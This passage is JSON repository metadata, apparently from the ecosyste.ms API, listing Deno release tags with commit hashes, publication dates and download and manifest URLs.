27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha